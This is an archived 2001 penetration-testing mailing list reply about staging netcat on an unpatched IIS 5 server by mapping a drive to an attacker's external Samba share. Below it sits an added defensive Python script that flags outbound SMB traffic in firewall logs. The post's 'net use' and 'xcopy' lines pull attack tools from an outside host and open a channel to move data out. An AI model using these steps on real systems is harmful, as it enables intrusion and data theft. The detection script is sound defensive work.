Penetration Testing mailing list archives

Re: pen testing iis 5


From: Stephen Friedl <friedl () mtndew com>
Date: Thu, 21 Jun 2001 15:31:24 -0700

I am pen-testing IIS 5 [no hotfixes] running in WinNT 4.0 with no fixes.
At this point I want to upload a file to the box [nc.exe] and then I will
definitely have the box. How can I go about doing this?

If the network can do outbound NETBIOS, I open up a public Samba share
on a machine on MY network outside the firewall. Then, when hacking the
remote machine I do

        mkdir c:\foo                            working area

        net use q: \\my.box\public              think globally...

        xcopy q:\nc.exe c:\foo                  copy locally...

Now the file is in your local work area, and it's a piece of cake
to get stuff in and out via the "Q:" drive. Works like a champ.

Steve

--- 
Stephen J Friedl | Software Consultant | Tustin, CA |   +1 714 544-6561
www.unixwiz.net  | I speak for me only |   KA8CMY   | steve () unixwiz net
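
The transfer described in this post only works if the target may open NetBIOS/SMB sessions to a host outside the firewall. As an added example (not part of the original message), this is a defender-side check that flags such egress in firewall logs. The log format (`action proto src dst dport`), the sample lines and the choice of RFC 1918 ranges as "internal" are assumptions made for illustration.

```python
import ipaddress

# NetBIOS name/datagram/session services and direct-hosted SMB.
SMB_PORTS = {137, 138, 139, 445}

# Assumption: the protected network uses RFC 1918 address space.
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(addr):
    """True if addr falls inside one of the assumed internal ranges."""
    ip = ipaddress.ip_address(addr)  # raises ValueError on a bad address
    return any(ip in net for net in INTERNAL_NETS)


def find_outbound_smb(lines):
    """Return (src, dst, dport, action) for internal -> external SMB flows."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) != 5:
            continue  # not in the assumed five-field format
        action, _proto, src, dst, dport = fields
        try:
            port = int(dport)
            outbound = is_internal(src) and not is_internal(dst)
        except ValueError:
            continue  # unparseable port or address
        if port in SMB_PORTS and outbound:
            hits.append((src, dst, port, action))
    return hits


# Constructed sample log lines (documentation addresses, not real hosts).
SAMPLE_LOG = [
    "ALLOW TCP 10.0.5.20 203.0.113.7 139",   # server reaching an external share
    "ALLOW TCP 10.0.5.20 10.0.9.4 445",      # internal file sharing, ignored
    "DENY TCP 10.0.5.21 198.51.100.9 445",   # blocked attempt, still worth review
    "ALLOW TCP 10.0.5.20 203.0.113.7 80",    # not an SMB port
    "garbage line",
]

if __name__ == "__main__":
    for src, dst, port, action in find_outbound_smb(SAMPLE_LOG):
        print(f"{action}: {src} -> {dst}:{port} (outbound NetBIOS/SMB)")
```

An ALLOW hit means the egress filter permits the path this post relies on; a DENY hit shows the filter working but still points at a host that tried to reach an external share.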

